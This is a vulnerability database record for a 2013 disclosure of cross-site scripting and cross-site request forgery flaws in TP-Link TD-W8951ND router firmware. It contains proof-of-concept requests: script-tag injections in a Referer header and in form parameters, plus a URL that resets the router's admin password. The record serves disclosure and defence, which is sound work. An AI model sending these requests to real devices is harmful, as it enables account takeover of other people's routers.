ID

VAR-201308-0460


TITLE

TP-LINK TD-W8951ND Router has multiple input validation vulnerabilities

Trust: 0.6

sources: CNVD: CNVD-2013-12811

DESCRIPTION

The TP-LINK TD-W8951ND Router is a wireless router device. TP-LINK TD-W8951ND Router Firmware 4.0.0 Build 120607 Release 30923 has multiple cross-site scripting and cross-site request forgery vulnerabilities. An attacker can exploit them to obtain sensitive information or hijack a user's session: 1. The Referer header is handled incorrectly on requests for non-existent URL pages, allowing unauthenticated attackers to perform reflected cross-site scripting. 2. The "home_wlan_1" parameters are handled incorrectly, allowing authenticated attackers to perform reflected cross-site scripting. 3. Multiple cross-site request forgery weaknesses allow an attacker to construct a malicious URI, entice a logged-in user into opening it, and perform operations in that user's context, such as resetting the administrator password. Attackers can use these vulnerabilities to execute arbitrary script code in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized operations, and disclose or modify sensitive information; other forms of attack may also be possible. The vulnerabilities are present in TP-Link TD-W8951ND 4.0.0 Build 120607.Rel. 30923; other versions may also be affected.
-----------
Author:
-----------
xistence < xistence[at]0x90[.]nl >

-------------------------
Affected products:
-------------------------
Tested on TP-Link TD-W8951ND Firmware 4.0.0 Build 120607 Rel.30923

-------------------------
Affected vendors:
-------------------------
TP-Link
http://www.tp-link.com/

----------
Details:
----------

[ 0x01 - Unauthenticated Reflected XSS in Referer for non-existing url pages ]

GET /doesnotexist HTTP/1.1
Host: <IP>
Referer: http://pwned"><script>alert("XSS")</script>
Connection: keep-alive

[ 0x02 - Authenticated Reflected XSS in "home_wlan_1" arguments ]

http://<IP>/Forms/home_wlan_1?wlanWEBFlag=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
http://<IP>/Forms/home_wlan_1?AccessFlag=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
http://<IP>/Forms/home_wlan_1?wlan_APenable=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E

[ 0x03 - Authenticated XSS in diagnostics (ping) "/Forms/tools_test_1" argument "PingIPAddr" ]

POST /Forms/tools_test_1 HTTP/1.1
Host: <IP>
Referer: http://<IP>/maintenance/tools_test.htm
Authorization: Basic blablabla==
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 164

Test_PVC=PVC0&PingIPAddr=%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&pingflag=1&trace_open_flag=0&InfoDisplay=Ping+request+could+not+find+host+

[ 0x04 - Reset Admin password CSRF ]

http://<IP>/Forms/tools_admin_1?uiViewTools_Password=PWNED&uiViewTools_PasswordConfirm=PWNED

--------------
Timeline:
--------------
2013-05-30 Provided details to TP-Link.
2013-06-01 Response from TP-Link that they will try to fix it.
2013-07-31 No further response, mailed again to ask for status.
2013-08-30 No response, public disclosure

Trust: 1.44

sources: CNVD: CNVD-2013-12811 // CNNVD: CNNVD-201308-547 // BID: 62103 // PACKETSTORM: 123016

IOT TAXONOMY

category: ['Network device']
sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2013-12811

AFFECTED PRODUCTS

vendor: tp link
model: td-w8951nd router
scope: -
version: -

Trust: 0.6

vendor: tp link
model: td-w8951nd build 120607.r
scope: eq
version: 4.0.0

Trust: 0.3

sources: CNVD: CNVD-2013-12811 // BID: 62103

CVSS

SEVERITY

CVSSV2

CVSSV3

CNVD: CNVD-2013-12811
value: MEDIUM

Trust: 0.6

CNVD: CNVD-2013-12811
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:P/I:N/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

sources: CNVD: CNVD-2013-12811

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201308-547

TYPE

input validation

Trust: 0.6

sources: CNNVD: CNNVD-201308-547

EXTERNAL IDS

db: BID, id: 62103

Trust: 1.5

db: PACKETSTORM, id: 123016

Trust: 0.7

db: CNVD, id: CNVD-2013-12811

Trust: 0.6

db: CNNVD, id: CNNVD-201308-547

Trust: 0.6

sources: CNVD: CNVD-2013-12811 // BID: 62103 // PACKETSTORM: 123016 // CNNVD: CNNVD-201308-547

REFERENCES

url: http://packetstormsecurity.com/files/123016/tplinktdw8951nd-xssxsrf.txt

Trust: 0.6

url: http://www.securityfocus.com/bid/62103

Trust: 0.6

url: http://www.tp-link.us/support/download/?pcid=203&model=td-w8951nd

Trust: 0.3

url: http://pwned"><script>alert("xss")</script>

Trust: 0.1

url: http://www.tp-link.com/

Trust: 0.1

url: http://<ip>/maintenance/tools_test.htm

Trust: 0.1

sources: CNVD: CNVD-2013-12811 // BID: 62103 // PACKETSTORM: 123016 // CNNVD: CNNVD-201308-547

CREDITS

xistence

Trust: 1.0

sources: BID: 62103 // PACKETSTORM: 123016 // CNNVD: CNNVD-201308-547

SOURCES

db: CNVD, id: CNVD-2013-12811
db: BID, id: 62103
db: PACKETSTORM, id: 123016
db: CNNVD, id: CNNVD-201308-547

LAST UPDATE DATE

2022-05-17T01:43:24.463000+00:00


SOURCES UPDATE DATE

db: CNVD, id: CNVD-2013-12811, date: 2013-09-05T00:00:00
db: BID, id: 62103, date: 2013-08-30T00:00:00
db: CNNVD, id: CNNVD-201308-547, date: 2013-09-04T00:00:00

SOURCES RELEASE DATE

db: CNVD, id: CNVD-2013-12811, date: 2013-09-05T00:00:00
db: BID, id: 62103, date: 2013-08-30T00:00:00
db: PACKETSTORM, id: 123016, date: 2013-08-30T18:22:22
db: CNNVD, id: CNNVD-201308-547, date: 2013-08-30T00:00:00